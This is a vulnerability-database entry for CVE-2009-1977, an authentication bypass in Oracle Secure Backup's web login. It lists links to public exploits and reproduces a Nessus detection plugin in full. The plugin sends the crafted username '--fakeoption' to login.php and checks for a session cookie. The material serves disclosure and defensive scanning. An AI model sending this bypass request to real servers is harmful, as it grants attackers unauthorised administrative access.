Vulnerabilities > CVE-2009-1977 - Remote Authentication Bypass vulnerability in Oracle Secure Backup 10.2.0.3

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
oracle
critical
nessus
exploit available
metasploit
NVD
Published: 2009-07-14
Updated: 2017-08-17

Summary

Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the July 2009 Oracle CPU. Oracle has not commented on claims from an independent researcher that this vulnerability allows attackers to bypass authentication via unknown vectors involving the username parameter and login.php.

Vulnerable Configurations

Part Description Count
Application
Oracle
1

D2sec

nameOracle Secure Backup 10.3.0.1 RCE
urlhttp://www.d2sec.com/exploits/oracle_secure_backup_10.3.0.1_rce.html

Exploit-Db

descriptionOracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit. CVE-2009-1977. Remote exploit for windows platform
idEDB-ID:9652
last seen2016-02-01
modified2009-09-14
published2009-09-14
reporterikki
sourcehttps://www.exploit-db.com/download/9652/
titleOracle Secure Backup Server 10.3.0.1.0 - Auth Bypass/RCI Exploit

Metasploit

descriptionThis module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32).
idMSF:AUXILIARY/ADMIN/ORACLE/OSB_EXECQR2
last seen2019-12-13
modified2017-07-24
published2009-09-16
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/oracle/osb_execqr2.rb
titleOracle Secure Backup Authentication Bypass/Command Injection Vulnerability

Nessus

NASL familyCGI abuses
NASL idOSB_FAKEOPTION_AUTH_BYPASS.NASL
descriptionThe remote web server is the Administration Server for Oracle Secure Backup, a centralized tape backup management software application. The installed version of Oracle Secure Backup allows a remote attacker to bypass authentication using a specially crafted username, such as
last seen2020-06-01
modified2020-06-02
plugin id40989
published2009-09-14
reporterThis script is Copyright (C) 2009-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/40989
titleOracle Secure Backup Administration Server Authentication Bypass
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(40989);
  script_version("1.21");
  script_cvs_date("Date: 2018/11/15 20:50:18");

  script_cve_id("CVE-2009-1977");
  script_bugtraq_id(35672);
  script_xref(name:"EDB-ID", value:"9652");

  script_name(english:"Oracle Secure Backup Administration Server Authentication Bypass");
  script_summary(english:"Tries to generate a SQL error");

  script_set_attribute( attribute:"synopsis", value:
"The remote web server contains a PHP application that allows an
attacker to bypass authentication."  );
  script_set_attribute( attribute:"description",  value:
"The remote web server is the Administration Server for Oracle Secure
Backup, a centralized tape backup management software application.

The installed version of Oracle Secure Backup allows a remote attacker
to bypass authentication using a specially crafted username, such as
'--fakeoption'.

An unauthenticated, remote attacker can leverage this issue to bypass
authentication and gain administrative access to the application.
Under Windows, this can lead to a complete system compromise.

Note that this install is also likely to be affected by multiple
command injection vulnerabilities, although Nessus has not checked for
them."  );
  script_set_attribute( attribute:"see_also",  value:
"https://www.zerodayinitiative.com/advisories/ZDI-09-058/"  );
  script_set_attribute( attribute:"see_also",  value:
"https://seclists.org/fulldisclosure/2009/Aug/249"  );
  script_set_attribute( attribute:"see_also",  value:
"https://www.oracle.com/technetwork/topics/security/cpujul2009-091332.html"  );
  script_set_attribute( attribute:"solution",  value:
"Upgrade to Oracle Secure Backup version 10.2.0.3 or later."  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Oracle Secure Backup 10.3.0.1 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"cpe",value:"cpe:/a:oracle:secure_backup");
  script_set_attribute(
    attribute:"vuln_publication_date", 
    value:"2009/08/18"
  );
  script_set_attribute(
    attribute:"patch_publication_date", 
    value:"2009/07/14"
  );
  script_set_attribute(
    attribute:"plugin_publication_date", 
    value:"2009/09/14"
  );
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 443);
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:443);
if (!can_host_php(port:port)) exit(0, "Web server does not support PHP scripts.");


# nb: the username can be anything starting with '--'.
#     and the password can be anything.
user = "--fakeoption";
pass = "NESSUS";


# Make sure the affected script exists.
url = "/login.php";

res = http_send_recv3(port:port, method:"GET", item:url);
if (isnull(res)) exit(1, "The web server failed to respond.");

if (
  "<title>Oracle Secure Backup Web Interface</title>" >< res[2] &&
  '<input name="uname" ' >< res[2]
)
{
  postdata = string(
    "button=Login&",
    "attempt=1&",
    "mode=&",
    "tab=&",
    "uname=", user, "&",
    "passwd=", pass
  );

  req = http_mk_post_req(
    port        : port,
    item        : url, 
    data        : postdata,
    content_type: "application/x-www-form-urlencoded"
  );
  res = http_send_recv_req(port:port, req:req, exit_on_fail: 1);

  hdrs = parse_http_headers(status_line:res[0], headers:res[1]);
  if (isnull(hdrs['$code'])) code = 0;
  else code = hdrs['$code'];

  if (isnull(hdrs['set-cookie'])) cookies = "";
  else cookies = hdrs['set-cookie'];

  if (isnull(hdrs['location'])) location = "";
  else location = hdrs['location'];

  # There's a problem if ...
  if (
    # we're redirected and ...
    code == 302 &&
    "/index.php?tab=&mode=" >< location &&
    # a session cookie was set.
    "PHPSESSID=" >< cookies
  )
  {
    if (report_verbosity > 0)
    {
      req_str = http_mk_buffer_from_req(req:req);

      report = string(
        "\n",
        "Nessus was able to gain access using the following credentials :\n",
        "\n",
        "  URL      : ", build_url(port:port, qs:url), "\n",
        "  User     : ", user, "\n",
        "  Password : ", pass, "\n"
      );
      security_hole(port:port, extra:report);
    }
    else security_hole(port);
    exit(0);
  }
}

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/81262/osbs-bypass.txt
idPACKETSTORM:81262
last seen2016-12-05
published2009-09-15
reporterLuca Carettoni
sourcehttps://packetstormsecurity.com/files/81262/Oracle-Secure-Backup-Server-Bypass-Command-Injection.html
titleOracle Secure Backup Server Bypass / Command Injection

Seebug

bulletinFamilyexploit
descriptionNo description provided by source.
idSSV:12329
last seen2017-11-19
modified2009-09-16
published2009-09-16
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-12329
titleOracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit

References